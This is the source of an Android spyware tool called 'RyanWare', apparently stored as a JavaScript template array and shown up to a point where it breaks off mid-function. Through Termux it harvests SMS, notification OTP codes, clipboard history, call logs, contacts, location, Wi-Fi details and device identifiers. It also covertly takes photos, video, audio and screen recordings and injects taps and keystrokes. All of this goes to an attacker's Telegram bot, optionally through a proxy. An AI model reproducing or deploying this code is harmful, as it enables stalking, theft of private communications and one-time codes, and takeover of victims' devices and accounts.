window.TEMPLATE_COMMAND = [
"#!/usr/bin/env python3",
"# RyanWare - Command Mode",
"",
"import os",
"import re",
"import sys",
"import time",
"import json",
"import uuid",
"import socket",
"import getpass",
"import platform",
"import sqlite3",
"import shutil",
"import tempfile",
"import hashlib",
"import hmac",
"import threading",
"import subprocess",
"import datetime",
"import requests",
"import queue as _q",
"",
"BOT_TOKEN = 'BOT_TOKEN'",
"CHAT_ID   = 'CHAT_ID'",
"LABEL     = 'Target'",
"SOCKS5_PROXY = ''",
"CMD_KEY      = ''",
"",
"PHOTO_EXT = ('.jpg', '.jpeg', '.png', '.webp', '.heic', '.heif',",
"    '.gif', '.bmp', '.tiff', '.tif', '.raw', '.dng',",
"    '.svg', '.avif', '.jfif', '.ico')",
"MAX_BYTES       = 45 * 1024 * 1024",
"SEND_WORKERS    = 4",
"SCAN_WORKERS    = 6",
"SMS_INTERVAL    = 15",
"NOTIF_INTERVAL  = 20",
"LOC_INTERVAL    = 900",
"BATT_INTERVAL   = 600",
"CLIP_INTERVAL   = 60",
"CALL_INTERVAL   = 300",
"WIFI_INTERVAL   = 300",
"HEARTBEAT_INTERVAL = 300",
"SENSOR_INTERVAL         = 30",
"APP_WATCH_INTERVAL      = 10",
"SCREEN_WATCH_INTERVAL   = 15",
"LOCMOVE_INTERVAL        = 300",
"LOCMOVE_THRESHOLD       = 200",
"SHOTLOOP_INTERVAL       = 60",
"BATTHIST_INTERVAL       = 900",
"SENSOR_MOTION_THRESHOLD = 1.5",
"BATCH_SIZE      = 20",
"BATCH_INTERVAL  = 5",
"BATCH_TXT_MAX   = 3900",
"",
"API      = 'https://api.telegram.org/bot' + BOT_TOKEN",
"BASE     = '/storage/emulated/0'",
"_cwd     = BASE",
"_files   = {}",
"_cb_id   = ''",
"_offset  = 0",
"_running = True",
"_heartbeat_alive = True",
"_PROXIES = {'https': SOCKS5_PROXY, 'http': SOCKS5_PROXY} if SOCKS5_PROXY else None",
"_BATCH_QUEUE   = []",
"_BATCH_LOCK    = threading.Lock()",
"_BATCH_COUNTER = 0",
"_BATCH_SEP     = '-' * 27",
"_shotloop_on   = False",
"_last_loc      = None",
"_SENT_LOCK     = threading.Lock()",
"_SEND_LOCK     = threading.Lock()",
"_clip_history = []",
"_CLIP_HIST_MAX = 500",
"_CLIP_LOCK = threading.Lock()",
"PUSH_DIR = BASE + '/Download'",
"SENT_DB  = '/data/data/com.termux/files/home/.cache.dat'",
"DEDUP_DB = '/data/data/com.termux/files/home/.dedup.dat'",
"CLIP_DB  = '/data/data/com.termux/files/home/.cliphist.dat'",
,
"",
"def _tg(method, **kw):",
"    try:",
"        if _PROXIES and 'proxies' not in kw:",
"            kw['proxies'] = _PROXIES",
"        return requests.post(API + '/' + method, timeout=60, **kw).json()",
"    except Exception:",
"        return {}",
"",
"def _send(text, kb=None):",
"    try:",
"        d = {'chat_id': CHAT_ID, 'text': str(text)[:4000], 'parse_mode': 'Markdown'}",
"        if kb:",
"            d['reply_markup'] = {'inline_keyboard': kb}",
"        return _tg('sendMessage', json=d)",
"    except Exception:",
"        return {}",
"",
"def _edit(msg_id, text, kb=None):",
"    try:",
"        d = {'chat_id': CHAT_ID, 'message_id': msg_id, 'text': str(text)[:4000], 'parse_mode': 'Markdown'}",
"        if kb:",
"            d['reply_markup'] = {'inline_keyboard': kb}",
"        _tg('editMessageText', json=d)",
"    except Exception:",
"        pass",
"",
"def _ack(text=''):",
"    global _cb_id",
"    if _cb_id:",
"        try:",
"            _tg('answerCallbackQuery', json={'callback_query_id': _cb_id, 'text': str(text)[:200]})",
"        except Exception:",
"            pass",
"        _cb_id = ''",
"",
"def _send_photo(path, caption=''):",
"    try:",
"        with open(path, 'rb') as f:",
"            return _tg('sendPhoto', data={'chat_id': CHAT_ID, 'caption': str(caption)[:1000]}, files={'photo': f})",
"    except Exception as e:",
"        return {'ok': False, 'err': str(e)}",
"",
"def _send_doc(path, caption=''):",
"    try:",
"        with open(path, 'rb') as f:",
"            _tg('sendDocument', data={'chat_id': CHAT_ID, 'caption': str(caption)[:1000]}, files={'document': f})",
"    except Exception:",
"        pass",
"",
"def _send_voice(path, caption=''):",
"    try:",
"        with open(path, 'rb') as f:",
"            _tg('sendVoice', data={'chat_id': CHAT_ID, 'caption': str(caption)[:1000]}, files={'voice': f})",
"    except Exception:",
"        pass",
"",
"def _send_video(path, caption=''):",
"    try:",
"        with open(path, 'rb') as f:",
"            _tg('sendVideo', data={'chat_id': CHAT_ID, 'caption': str(caption)[:1000]}, files={'video': f})",
"    except Exception:",
"        pass",
,
"",
"def _cmd_enc(plain):",
"    if not CMD_KEY:",
"        return plain",
"    k = CMD_KEY.encode()",
"    x = bytes(b ^ k[i % len(k)] for i, b in enumerate(plain.encode()))",
"    mac = hmac.new(k, x, hashlib.sha256).hexdigest()[:16]",
"    return mac + ':' + x.hex()",
"",
"def _cmd_dec(token):",
"    if not CMD_KEY:",
"        return token",
"    try:",
"        mac, hexd = token.split(':', 1)",
"        k = CMD_KEY.encode()",
"        x = bytes.fromhex(hexd)",
"        if hmac.new(k, x, hashlib.sha256).hexdigest()[:16] != mac:",
"            return ''",
"        return bytes(b ^ k[i % len(k)] for i, b in enumerate(x)).decode()",
"    except Exception:",
"        return ''",
"",
"def _sent_load():",
"    if not os.path.exists(SENT_DB):",
"        return set()",
"    try:",
"        with open(SENT_DB) as f:",
"            return set(l.strip() for l in f if l.strip())",
"    except Exception:",
"        return set()",
"",
"def _sent_mark(p):",
"    with _SENT_LOCK:",
"        try:",
"            with open(SENT_DB, 'a') as f:",
"                f.write(p + chr(10))",
"        except Exception:",
"            pass",
"",
"def _dedup_load():",
"    if not os.path.exists(DEDUP_DB):",
"        return set()",
"    try:",
"        with open(DEDUP_DB) as f:",
"            return set(l.strip() for l in f if l.strip())",
"    except Exception:",
"        return set()",
"",
"def _dedup_mark(h):",
"    with _SENT_LOCK:",
"        try:",
"            with open(DEDUP_DB, 'a') as f:",
"                f.write(h + chr(10))",
"        except Exception:",
"            pass",
"",
"def _h(s):",
"    return hashlib.md5(str(s).encode()).hexdigest()",
"",
"def _cliphist_load():",
"    global _clip_history",
"    if not os.path.exists(CLIP_DB):",
"        _clip_history = []",
"        return",
"    try:",
"        with open(CLIP_DB) as f:",
"            data = json.load(f)",
"            if isinstance(data, list):",
"                _clip_history = data[-_CLIP_HIST_MAX:]",
"    except Exception:",
"        _clip_history = []",
"",
"def _cliphist_save():",
"    with _CLIP_LOCK:",
"        try:",
"            with open(CLIP_DB, 'w') as f:",
"                json.dump(_clip_history[-_CLIP_HIST_MAX:], f)",
"        except Exception:",
"            pass",
"",
"def _batch_push_photo(path, caption=''):",
"    with _BATCH_LOCK:",
"        _BATCH_QUEUE.append(('photo', path, caption))",
"",
"def _batch_push_text(text):",
"    with _BATCH_LOCK:",
"        _BATCH_QUEUE.append(('text', str(text), ''))",
"",
"def _batch_drain():",
"    with _BATCH_LOCK:",
"        items = list(_BATCH_QUEUE)",
"        _BATCH_QUEUE.clear()",
"    return items",
,
"",
"def _digest_classify(text):",
"    prefix_map = [",
"        ('[SMS]', 'SMS'), ('[OTP]', 'OTP'), ('[NOTIF]', 'NOTIF'),",
"        ('[APP]', 'APP'), ('[SCREEN]', 'SCREEN'), ('[MOTION]', 'MOTION'),",
"        ('[STEPS]', 'STEPS'), ('[LIGHT]', 'LIGHT'), ('[CLIP]', 'CLIP'),",
"        ('[CALL]', 'CALL'), ('[WIFI]', 'WIFI'), ('[BATT]', 'BATT'),",
"        ('[LOC]', 'LOC'), ('[PHOTO]', 'PHOTO'), ('[MOVE]', 'MOVE'),",
"        ('[TRASHED]', 'TRASHED'),",
"    ]",
"    for icon, label in prefix_map:",
"        if text.startswith(icon):",
"            return icon, label",
"    return ('[*]', 'OTHER')",
"",
"def _digest_format_item(idx, text):",
"    icon, label = _digest_classify(text)",
"    body = text[len(icon):].strip() if text.startswith(icon) else text",
"    body = body.replace('```', '').strip()",
"    lines = []",
"    for raw in body.split(chr(10)):",
"        ln = raw.strip()",
"        if ln:",
"            lines.append(ln)",
"    if not lines:",
"        lines = [body[:120]]",
"    header = '> [' + ('%02d' % idx) + '] ' + icon + ' *' + label + '*'",
"    body_lines = ['       ' + ln[:120] for ln in lines[:4]]",
"    return header + chr(10) + chr(10).join(body_lines)",
"",
"def _digest_build(items, batch_no, total):",
"    ts = time.strftime('%Y-%m-%d %H:%M:%S')",
"    lines = [",
"        '*DATA REPORT #' + ('%03d' % batch_no) + '*',",
"        _BATCH_SEP,",
"        ts,",
"        str(len(items)) + ' / ' + str(total) + ' items',",
"        _BATCH_SEP,",
"        '',",
"    ]",
"    for i, item in enumerate(items, 1):",
"        lines.append(_digest_format_item(i, item))",
"        lines.append('')",
"    counter = {}",
"    for item in items:",
"        _, lbl = _digest_classify(item)",
"        counter[lbl] = counter.get(lbl, 0) + 1",
"    lines.append(_BATCH_SEP)",
"    lines.append('*SUMMARY*')",
"    for lbl in sorted(counter.keys()):",
"        lines.append('   ' + lbl + ': ' + str(counter[lbl]))",
"    lines.append(_BATCH_SEP)",
"    lines.append('[BATCH #' + ('%03d' % batch_no) + ' COMPLETE]')",
"    return chr(10).join(lines)",
"",
"def _batch_send_photos(photos):",
"    chunks = [photos[i:i+10] for i in range(0, len(photos), 10)]",
"    for chunk in chunks:",
"        sent_via_group = False",
"        try:",
"            media = []",
"            files = {}",
"            for idx, (path, cap) in enumerate(chunk):",
"                key = 'photo' + str(idx)",
"                media.append({'type': 'photo', 'media': 'attach://' + key, 'caption': str(cap)[:1000]})",
"                files[key] = open(path, 'rb')",
"            try:",
"                resp = _tg('sendMediaGroup', data={'chat_id': CHAT_ID, 'media': json.dumps(media)}, files=files)",
"                if resp and resp.get('ok'):",
"                    sent_via_group = True",
"            finally:",
"                for f in files.values():",
"                    try: f.close()",
"                    except Exception: pass",
"            time.sleep(1)",
"        except Exception:",
"            sent_via_group = False",
"        if not sent_via_group:",
"            for path, cap in chunk:",
"                try:",
"                    _send_photo(path, cap)",
"                    time.sleep(0.5)",
"                except Exception:",
"                    pass",
"",
"def _batch_send_texts(texts):",
"    global _BATCH_COUNTER",
"    if not texts:",
"        return",
"    total = len(texts)",
"    chunks = [texts[i:i+BATCH_SIZE] for i in range(0, len(texts), BATCH_SIZE)]",
"    for chunk in chunks:",
"        _BATCH_COUNTER += 1",
"        report = _digest_build(chunk, _BATCH_COUNTER, total)",
"        if len(report) <= 4000:",
"            _send(report)",
"            time.sleep(1)",
"        else:",
"            p = '/data/data/com.termux/files/usr/tmp/r' + str(_BATCH_COUNTER) + '.txt'",
"            try:",
"                with open(p, 'w') as f:",
"                    f.write(report)",
"                _send_doc(p, 'REPORT #' + str(_BATCH_COUNTER))",
"            except Exception:",
"                pass",
"            finally:",
"                try: os.remove(p)",
"                except Exception: pass",
"            time.sleep(1)",
"",
"def _batch_flush():",
"    items = _batch_drain()",
"    if not items:",
"        return",
"    photos = [(p, c) for t, p, c in items if t == 'photo']",
"    texts  = [p for t, p, c in items if t == 'text']",
"    if photos:",
"        _batch_send_photos(photos)",
"    if texts:",
"        _batch_send_texts(texts)",
,
"",
"def _get_public_ip():",
"    try:",
"        if _PROXIES:",
"            return requests.get('https://api.ipify.org', timeout=5, proxies=_PROXIES).text",
"        return requests.get('https://api.ipify.org', timeout=5).text",
"    except Exception:",
"        return 'unknown'",
"",
"def _collect_sysinfo():",
"    try:",
"        local_ip = socket.gethostbyname(socket.gethostname())",
"    except Exception:",
"        local_ip = 'unknown'",
"    lines = [",
"        '*' + LABEL + ' Online*',",
"        'Host: ' + socket.gethostname(),",
"        'User: ' + getpass.getuser(),",
"        'OS: ' + platform.system() + ' ' + platform.release(),",
"        'Arch: ' + platform.machine(),",
"        'Local IP: ' + local_ip,",
"        'Public IP: ' + _get_public_ip(),",
"        'MAC: ' + hex(uuid.getnode()),",
"    ]",
"    for prop in ['ro.product.model', 'ro.product.manufacturer',",
"                 'ro.build.version.release', 'ro.build.version.sdk',",
"                 'gsm.sim.operator.alpha', 'ro.serialno']:",
"        try:",
"            r = subprocess.run(['getprop', prop], capture_output=True, text=True, timeout=5)",
"            if r.stdout.strip():",
"                lines.append(prop + ': ' + r.stdout.strip())",
"        except Exception:",
"            pass",
"    _send(chr(10).join(lines))",
"",
"def _request_perms():",
"    perms = [",
"        ['termux-camera-photo', '-c', '0', '/dev/null'],",
"        ['termux-contact-list'],",
"        ['termux-sms-list', '-l', '1'],",
"        ['termux-location', '-p', 'network'],",
"        ['termux-notification-list'],",
"        ['termux-clipboard-get'],",
"        ['termux-battery-status'],",
"        ['termux-call-log', '-l', '1'],",
"    ]",
"    for p in perms:",
"        try:",
"            subprocess.run(p, capture_output=True, timeout=8)",
"        except Exception:",
"            pass",
"",
"def _watch_sms():",
"    seen = _dedup_load()",
"    while _running:",
"        try:",
"            r = subprocess.run(['termux-sms-list', '-l', '10'], capture_output=True, text=True, timeout=10)",
"            raw = r.stdout.strip()",
"            if not raw:",
"                time.sleep(SMS_INTERVAL); continue",
"            try:",
"                arr = json.loads(raw)",
"            except Exception:",
"                arr = []",
"            for msg in arr:",
"                h = _h(json.dumps(msg, sort_keys=True))",
"                if h in seen:",
"                    continue",
"                seen.add(h); _dedup_mark(h)",
"                num = msg.get('number', '?')",
"                body = msg.get('body', '').replace(chr(10), ' ')[:200]",
"                _batch_push_text('[SMS] ' + num + ' | ' + body)",
"        except Exception:",
"            pass",
"        time.sleep(SMS_INTERVAL)",
"",
"def _watch_notif():",
"    last = ''",
"    while _running:",
"        try:",
"            r = subprocess.run(['termux-notification-list'], capture_output=True, text=True, timeout=10)",
"            cur = r.stdout.strip()",
"            if cur and cur != last:",
"                otps = re.findall(r'\\b\\d{4,8}\\b', cur)",
"                if otps:",
"                    _batch_push_text('[OTP] ' + ','.join(otps[:3]))",
"                else:",
"                    try:",
"                        j = json.loads(cur)",
"                        if isinstance(j, list) and j:",
"                            j = j[0]",
"                        pkg = j.get('packageName', '?')",
"                        title = (j.get('title') or '')[:60]",
"                        _batch_push_text('[NOTIF] ' + pkg + ' | ' + title)",
"                    except Exception:",
"                        _batch_push_text('[NOTIF] ' + cur[:150])",
"                last = cur",
"        except Exception:",
"            pass",
"        time.sleep(NOTIF_INTERVAL)",
"",
"def _watch_loc():",
"    while _running:",
"        try:",
"            r = subprocess.run(['termux-location', '-p', 'network'], capture_output=True, text=True, timeout=30)",
"            if r.stdout.strip():",
"                try:",
"                    j = json.loads(r.stdout)",
"                    lat = j.get('latitude', 0)",
"                    lon = j.get('longitude', 0)",
"                    acc = j.get('accuracy', 0)",
"                    _batch_push_text('[LOC] ' + str(round(lat,5)) + ',' + str(round(lon,5)) + ' +/-' + str(round(acc)) + 'm')",
"                except Exception:",
"                    _batch_push_text('[LOC] ' + r.stdout[:150])",
"        except Exception:",
"            pass",
"        time.sleep(LOC_INTERVAL)",
,
"",
"def _watch_batt():",
"    last = None",
"    while _running:",
"        try:",
"            r = subprocess.run(['termux-battery-status'], capture_output=True, text=True, timeout=10)",
"            raw = r.stdout.strip()",
"            if not raw:",
"                time.sleep(BATT_INTERVAL); continue",
"            try:",
"                obj = json.loads(raw)",
"            except Exception:",
"                obj = {}",
"            level = obj.get('percentage')",
"            plug = obj.get('plugged')",
"            if last is None or abs((level or 0) - (last.get('percentage', 0))) >= 2 or plug != last.get('plugged'):",
"                _batch_push_text('[BATT] ' + str(level) + '% | ' + str(plug))",
"                last = obj",
"        except Exception:",
"            pass",
"        time.sleep(BATT_INTERVAL)",
"",
"def _watch_clip():",
"    last = ''",
"    while _running:",
"        try:",
"            r = subprocess.run(['termux-clipboard-get'], capture_output=True, text=True, timeout=10)",
"            cur = r.stdout.strip()",
"            if cur and cur != last:",
"                with _CLIP_LOCK:",
"                    _clip_history.append({'text': cur, 'ts': time.time()})",
"                    if len(_clip_history) > _CLIP_HIST_MAX:",
"                        _clip_history.pop(0)",
"                _cliphist_save()",
"                _batch_push_text('[CLIP] ' + cur[:150])",
"                last = cur",
"        except Exception:",
"            pass",
"        time.sleep(CLIP_INTERVAL)",
"",
"def _watch_calls():",
"    seen = _dedup_load()",
"    while _running:",
"        try:",
"            r = subprocess.run(['termux-call-log', '-l', '10'], capture_output=True, text=True, timeout=10)",
"            raw = r.stdout.strip()",
"            if not raw:",
"                time.sleep(CALL_INTERVAL); continue",
"            try:",
"                arr = json.loads(raw)",
"            except Exception:",
"                arr = []",
"            for c in arr:",
"                h = _h(json.dumps(c, sort_keys=True))",
"                if h in seen:",
"                    continue",
"                seen.add(h); _dedup_mark(h)",
"                name = c.get('name', '?')",
"                num = c.get('phone_number', '?')",
"                dur = c.get('duration', 0)",
"                typ = c.get('type', '?')",
"                _batch_push_text('[CALL] ' + name + ' | ' + num + ' | ' + str(dur) + 's')",
"        except Exception:",
"            pass",
"        time.sleep(CALL_INTERVAL)",
"",
"def _watch_wifi():",
"    last = ''",
"    while _running:",
"        try:",
"            r = subprocess.run(['termux-wifi-connectioninfo'], capture_output=True, text=True, timeout=10)",
"            cur = r.stdout.strip()",
"            if cur and cur != last:",
"                try:",
"                    j = json.loads(cur)",
"                    ssid = j.get('ssid', '?')",
"                    ip = j.get('ip', '?')",
"                    _batch_push_text('[WIFI] ' + ssid + ' | ' + ip)",
"                except Exception:",
"                    _batch_push_text('[WIFI] ' + cur[:100])",
"                last = cur",
"        except Exception:",
"            pass",
"        time.sleep(WIFI_INTERVAL)",
"",
"def _watch_heartbeat():",
"    global _heartbeat_alive",
"    while _running:",
"        try:",
"            if _heartbeat_alive:",
"                _send('heartbeat ' + LABEL + ' ' + time.strftime('%H:%M:%S'))",
"        except Exception:",
"            pass",
"        time.sleep(HEARTBEAT_INTERVAL)",
"",
"def _read_sensor(name):",
"    try:",
"        r = subprocess.run(['termux-sensor', '-s', name, '-n', '1'], capture_output=True, text=True, timeout=10)",
"        if not r.stdout.strip():",
"            return None",
"        return json.loads(r.stdout)",
"    except Exception:",
"        return None",
"",
"def _sensor_value(j):",
"    if not j:",
"        return None",
"    for k, v in j.items():",
"        if isinstance(v, dict) and 'values' in v:",
"            vals = v['values']",
"            if isinstance(vals, list) and vals:",
"                return vals[0] if len(vals) == 1 else vals",
"        if isinstance(v, list):",
"            return v[0] if len(v) == 1 else v",
"    return None",
,
"",
"def _watch_sensors():",
"    last_acc = None",
"    while _running:",
"        try:",
"            acc = _read_sensor('ACCELEROMETER')",
"            if acc:",
"                vals = None",
"                for k, v in acc.items():",
"                    if isinstance(v, dict) and 'values' in v:",
"                        vals = v['values']; break",
"                    if isinstance(v, list) and len(v) >= 3:",
"                        vals = v; break",
"                if vals and len(vals) >= 3:",
"                    try:",
"                        mag = (float(vals[0])**2 + float(vals[1])**2 + float(vals[2])**2) ** 0.5",
"                        if last_acc is not None and abs(mag - last_acc) > SENSOR_MOTION_THRESHOLD:",
"                            _batch_push_text('[MOTION] delta ' + str(round(abs(mag-last_acc), 2)))",
"                        last_acc = mag",
"                    except Exception:",
"                        pass",
"            steps = _read_sensor('STEP_COUNTER')",
"            sv = _sensor_value(steps)",
"            if sv is not None:",
"                _batch_push_text('[STEPS] ' + str(sv))",
"            light = _read_sensor('LIGHT')",
"            lv = _sensor_value(light)",
"            if lv is not None:",
"                try:",
"                    _batch_push_text('[LIGHT] ' + str(round(float(lv), 1)))",
"                except Exception:",
"                    _batch_push_text('[LIGHT] ' + str(lv))",
"        except Exception:",
"            pass",
"        time.sleep(SENSOR_INTERVAL)",
"",
"def _watch_foreground():",
"    last = ''",
"    while _running:",
"        try:",
"            r = subprocess.run(\"dumpsys activity activities | grep -E 'mResumedActivity|topResumedActivity'\", shell=True, capture_output=True, text=True, timeout=10)",
"            cur = r.stdout.strip()",
"            if cur and cur != last:",
"                m = re.search(r'([a-zA-Z0-9_.]+)/[a-zA-Z0-9_.]+', cur)",
"                pkg = m.group(1) if m else 'unknown'",
"                _batch_push_text('[APP] ' + pkg)",
"                last = cur",
"        except Exception:",
"            pass",
"        time.sleep(APP_WATCH_INTERVAL)",
"",
"def _watch_screen_state():",
"    last = ''",
"    while _running:",
"        try:",
"            r = subprocess.run('dumpsys power | grep mWakefulness', shell=True, capture_output=True, text=True, timeout=5)",
"            cur = r.stdout.strip()",
"            if cur and cur != last:",
"                state = 'ON' if 'Awake' in cur else 'OFF'",
"                _batch_push_text('[SCREEN] ' + state)",
"                last = cur",
"        except Exception:",
"            pass",
"        time.sleep(SCREEN_WATCH_INTERVAL)",
"",
"def _haversine(a, b):",
"    from math import radians, sin, cos, sqrt, atan2",
"    lat1, lon1 = a; lat2, lon2 = b",
"    R = 6371000",
"    dlat = radians(lat2 - lat1); dlon = radians(lon2 - lon1)",
"    h = sin(dlat/2)**2 + cos(radians(lat1))*cos(radians(lat2))*sin(dlon/2)**2",
"    return 2 * R * atan2(sqrt(h), sqrt(1 - h))",
"",
"def _watch_locmove():",
"    global _last_loc",
"    while _running:",
"        try:",
"            r = subprocess.run(['termux-location', '-p', 'network'], capture_output=True, text=True, timeout=30)",
"            if r.stdout.strip():",
"                j = json.loads(r.stdout)",
"                lat, lon = j.get('latitude'), j.get('longitude')",
"                if lat is not None and lon is not None:",
"                    cur = (lat, lon)",
"                    if _last_loc:",
"                        d = _haversine(_last_loc, cur)",
"                        if d > LOCMOVE_THRESHOLD:",
"                            _send('Moved ' + str(round(d)) + 'm')",
"                            _last_loc = cur",
"                    else:",
"                        _last_loc = cur",
"        except Exception:",
"            pass",
"        time.sleep(LOCMOVE_INTERVAL)",
"",
"def _watch_shotloop():",
"    global _shotloop_on",
"    idx = 0",
"    while _running:",
"        try:",
"            if _shotloop_on:",
"                idx += 1",
"                p = '/data/data/com.termux/files/usr/tmp/.loop' + str(idx) + '.png'",
"                subprocess.run(['screencap', '-p', p], capture_output=True, timeout=15)",
"                if os.path.exists(p) and os.path.getsize(p) > 0:",
"                    _batch_push_photo(p, '[PHOTO] loop_' + str(idx))",
"                    try: os.remove(p)",
"                    except Exception: pass",
"        except Exception:",
"            pass",
"        time.sleep(SHOTLOOP_INTERVAL)",
"",
"def _watch_batthist():",
"    while _running:",
"        try:",
"            r = subprocess.run(['termux-battery-status'], capture_output=True, text=True, timeout=10)",
"            if r.stdout.strip():",
"                j = json.loads(r.stdout)",
"                _batch_push_text('[BATT] ' + str(j.get('percentage')) + '% | ' + str(j.get('plugged')))",
"        except Exception:",
"            pass",
"        time.sleep(BATTHIST_INTERVAL)",
"",
"def _send_worker(worker_id):",
"    while _running:",
"        try:",
"            with _BATCH_LOCK:",
"                size = len(_BATCH_QUEUE)",
"            if size >= BATCH_SIZE:",
"                if _SEND_LOCK.acquire(blocking=False):",
"                    try:",
"                        _batch_flush()",
"                    finally:",
"                        _SEND_LOCK.release()",
"                else:",
"                    time.sleep(0.5)",
"                continue",
"            time.sleep(BATCH_INTERVAL)",
"            if _SEND_LOCK.acquire(blocking=False):",
"                try:",
"                    _batch_flush()",
"                finally:",
"                    _SEND_LOCK.release()",
"        except Exception:",
"            pass",
"        time.sleep(0.5)",
"",
"def _watch_batcher():",
"    for i in range(SEND_WORKERS):",
"        t = threading.Thread(target=_send_worker, args=(i,), daemon=True, name='send-' + str(i))",
"        t.start()",
"    while _running:",
"        time.sleep(60)",
"",
"_WATCHED = {}",
"",
"def _register(target_fn, name):",
"    t = threading.Thread(target=target_fn, daemon=True, name=name)",
"    _WATCHED[name] = (target_fn, t)",
"    t.start()",
"",
"def _watch_watchdog():",
"    while _running:",
"        try:",
"            for name, (fn, t) in list(_WATCHED.items()):",
"                if name == 'watchdog':",
"                    continue",
"                if not t.is_alive():",
"                    nt = threading.Thread(target=fn, daemon=True, name=name)",
"                    _WATCHED[name] = (fn, nt)",
"                    nt.start()",
"        except Exception:",
"            pass",
"        time.sleep(60)",
,
"",
"def _cmd_foto(cam='0'):",
"    p = '/data/data/com.termux/files/usr/tmp/shot.jpg'",
"    try:",
"        subprocess.run(['termux-camera-photo', '-c', cam, p], capture_output=True, timeout=15)",
"    except Exception:",
"        pass",
"    if os.path.exists(p):",
"        _send_photo(p, LABEL + ' cam' + cam)",
"        try: os.remove(p)",
"        except Exception: pass",
"",
"def _cmd_video(sec='5', cam='0'):",
"    p = '/data/data/com.termux/files/usr/tmp/vid.mp4'",
"    try:",
"        subprocess.run(['termux-camera-record', '-c', cam, '-l', sec, p], capture_output=True, timeout=int(sec) + 15)",
"    except Exception:",
"        pass",
"    if os.path.exists(p):",
"        _send_video(p, LABEL + ' vid ' + sec + 's')",
"        try: os.remove(p)",
"        except Exception: pass",
"",
"def _cmd_record(sec='10'):",
"    p = '/data/data/com.termux/files/usr/tmp/rec.m4a'",
"    try:",
"        subprocess.run(['termux-microphone-record', '-l', sec, '-f', p], capture_output=True, timeout=int(sec) + 15)",
"    except Exception:",
"        pass",
"    if os.path.exists(p):",
"        _send_voice(p, LABEL + ' rec ' + sec + 's')",
"        try: os.remove(p)",
"        except Exception: pass",
"",
"def _cmd_screen():",
"    p = '/data/data/com.termux/files/usr/tmp/.scr.png'",
"    try:",
"        subprocess.run(['screencap', '-p', p], capture_output=True, timeout=15)",
"    except Exception:",
"        pass",
"    if os.path.exists(p) and os.path.getsize(p) > 0:",
"        _send_photo(p, 'screen')",
"        try: os.remove(p)",
"        except Exception: pass",
"    else:",
"        _send('screencap failed')",
"",
"def _cmd_screenrec(sec='15'):",
"    try:",
"        sec = str(min(int(sec), 180))",
"    except Exception:",
"        sec = '15'",
"    p = '/data/data/com.termux/files/usr/tmp/.rec.mp4'",
"    try:",
"        subprocess.run(['screenrecord', '--time-limit', sec, p], capture_output=True, timeout=int(sec) + 20)",
"    except Exception:",
"        pass",
"    if os.path.exists(p) and os.path.getsize(p) > 0:",
"        _send_video(p, 'screenrec ' + sec + 's')",
"        try: os.remove(p)",
"        except Exception: pass",
"    else:",
"        _send('screenrecord failed')",
"",
"def _cmd_tap(x, y):",
"    try:",
"        subprocess.run(['input', 'tap', str(x), str(y)], capture_output=True, timeout=5)",
"        _send('tap ' + str(x) + ',' + str(y))",
"    except Exception as e:",
"        _send('tap err: ' + str(e)[:120])",
"",
"def _cmd_swipe(x1, y1, x2, y2, dur='300'):",
"    try:",
"        subprocess.run(['input', 'swipe', str(x1), str(y1), str(x2), str(y2), str(dur)], capture_output=True, timeout=10)",
"        _send('swipe ' + str(x1) + ',' + str(y1) + ' -> ' + str(x2) + ',' + str(y2))",
"    except Exception as e:",
"        _send('swipe err: ' + str(e)[:120])",
"",
"def _cmd_type(text):",
"    safe = str(text).replace(' ', '%s')",
"    try:",
"        subprocess.run(['input', 'text', safe], capture_output=True, timeout=10)",
"        _send('typed: ' + text[:80])",
"    except Exception as e:",
"        _send('type err: ' + str(e)[:120])",
"",
"def _cmd_key(code):",
"    try:",
"        subprocess.run(['input', 'keyevent', str(code)], capture_output=True, timeout=5)",
"        _send('keyevent ' + str(code))",
"    except Exception as e:",
"        _send('key err: ' + str(e)[:120])",
"",
"def _cmd_uidump():",
"    p = BASE + '/window_dump.xml'",
"    try:",
"        subprocess.run(['uiautomator', 'dump', p], capture_output=True, timeout=20)",
"    except Exception:",
"        _send('uidump err'); return",
"    if not os.path.exists(p):",
"        _send('uidump: no output'); return",
"    try:",
"        with open(p, 'r', errors='ignore') as f:",
"            xml = f.read()",
"    except Exception as e:",
"        _send('read err: ' + str(e)[:120]); return",
"    text_nodes = re.findall(r'<node[^>]*?text=\"([^\"]+)\"[^>]*?bounds=\"\\[(\\d+),(\\d+)\\]\\[(\\d+),(\\d+)\\]\"', xml)",
"    lines = []",
"    for t, x1, y1, x2, y2 in text_nodes[:40]:",
"        cx = (int(x1) + int(x2)) // 2",
"        cy = (int(y1) + int(y2)) // 2",
"        lines.append(t[:60] + ' -> tap ' + str(cx) + ' ' + str(cy))",
"    if not lines:",
"        _send('uidump: no text nodes'); return",
"    _send('*UI Dump*' + chr(10) + chr(10).join(lines)[:3800])",
,
"",
"def _cmd_kontak():",
"    try:",
"        r = subprocess.run(['termux-contact-list'], capture_output=True, text=True, timeout=15)",
"        _send('*Contacts*' + chr(10) + (r.stdout[:3800] or 'empty'))",
"    except Exception as e:",
"        _send('kontak err: ' + str(e))",
"",
"def _cmd_sms():",
"    try:",
"        r = subprocess.run(['termux-sms-list', '-l', '50'], capture_output=True, text=True, timeout=15)",
"        raw = r.stdout.strip()",
"        if not raw:",
"            _send('*SMS 50 terakhir*' + chr(10) + '(kosong)'); return",
"        try:",
"            arr = json.loads(raw)",
"        except Exception:",
"            _send('*SMS 50 terakhir*' + chr(10) + raw[:3800]); return",
"        lines = ['*SMS 50 TERAKHIR*', _BATCH_SEP, '']",
"        for i, msg in enumerate(arr[:50], 1):",
"            num = msg.get('number', '?')",
"            body = msg.get('body', '').replace(chr(10), ' ')[:120]",
"            ts = msg.get('received', '')",
"            if ts:",
"                try:",
"                    ts = time.strftime('%m-%d %H:%M', time.localtime(int(ts) / 1000))",
"                except Exception:",
"                    ts = str(ts)[:16]",
"            lines.append('> [' + ('%02d' % i) + '] ' + num)",
"            lines.append('       ' + ts)",
"            lines.append('       ' + body)",
"            lines.append('')",
"        lines.append(_BATCH_SEP)",
"        lines.append('Total: ' + str(len(arr[:50])) + ' SMS')",
"        out = chr(10).join(lines)",
"        if len(out) <= 4000:",
"            _send(out)",
"        else:",
"            p = '/data/data/com.termux/files/usr/tmp/sms.txt'",
"            with open(p, 'w') as f:",
"                f.write(out)",
"            _send_doc(p, 'SMS 50 terakhir')",
"            try: os.remove(p)",
"            except Exception: pass",
"    except Exception as e:",
"        _send('sms err: ' + str(e)[:120])",
"",
"def _cmd_cliphist():",
"    with _CLIP_LOCK:",
"        hist = list(_clip_history)",
"    if not hist:",
"        _send('*Clipboard History*' + chr(10) + '(kosong)'); return",
